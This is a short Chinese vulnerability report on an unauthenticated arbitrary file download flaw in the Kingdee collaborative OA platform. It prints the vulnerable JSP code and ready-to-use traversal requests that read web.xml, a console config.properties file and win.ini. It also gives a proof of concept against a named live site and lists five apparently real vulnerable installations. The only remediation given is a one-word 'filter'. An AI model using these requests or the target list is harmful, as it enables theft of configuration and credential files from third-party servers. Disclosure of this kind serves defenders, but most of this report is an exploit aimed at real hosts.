金蝶协同办公平台任意文件下载漏洞（无需登录）

经测试发现&＃xff0c;该系统存在任意文件下载&＃xff0c;且无需登录

存在漏洞的文件&＃xff1a;

/oa/admin/application/file_download.jsp?filePath&＃61;http://x.x.x.x:7890/oa/fileDownload.do?type&＃61;File&path&＃61;/../webapp/WEB-INF/web.xml
/../oaconsole/config/config.properties
c:\windows\win.ini


部分漏洞代码为&＃xff1a;

<%&＃64; page import&＃61;"java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%><%String logPath &＃61; request.getParameter("filePath")&＃61;&＃61;null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath");String contentType &＃61; request.getParameter("contentType")&＃61;&＃61;null?"application/x-download":request.getParameter("contentType");String fileName &＃61; request.getParameter("fileName")&＃61;&＃61;null?"file.txt":request.getParameter("fileName");java.io.OutputStream ou &＃61; null;java.io.InputStream is &＃61; null;try{java.io.File logFile &＃61; new java.io.File(logPath);if (logFile.exists()) {is &＃61; new java.io.FileInputStream(logPath);byte[] content &＃61; new byte[1024];int i &＃61; 0;response.setContentType(contentType);ou &＃61; response.getOutputStream();response.setHeader("Content-Disposition", "attachment; filename&＃61;\""&＃43;fileName&＃43;"\"");while ((i &＃61; is.read(content)) !&＃61; -1) {ou.write(content, 0, i);}ou.flush(); } else {out.println("file not found:"&＃43;logPath); }} catch (Exception e) {System.out.println(e);} finally {if (ou !&＃61; null) ou.close();if (is !&＃61; null) is.close();}%>


很明显的任意文件下载漏洞&＃xff0c;随便在网上找一个实例进行证明
http://oa.xpngs.com/oa/admin/application/file_download.jsp?filePath&＃61;c:\windows\win.ini

直接访问即可下载该文件了&＃xff0c;保存的文件名为&＃xff1a;file.txt

5个案例&＃xff1a;

http://oa.xpngs.com/oa/themes/mskin/login/login.jsphttp://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsphttp://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsphttp://113.106.196.36:7890/oa/themes/mskin/login/login.jsp?login_error&＃61;quithttp://www.jrxoa.com/oa/themes/mskin/login/login.jsp


漏洞证明&＃xff1a;
下载的文件

修复方案&＃xff1a;
过滤吧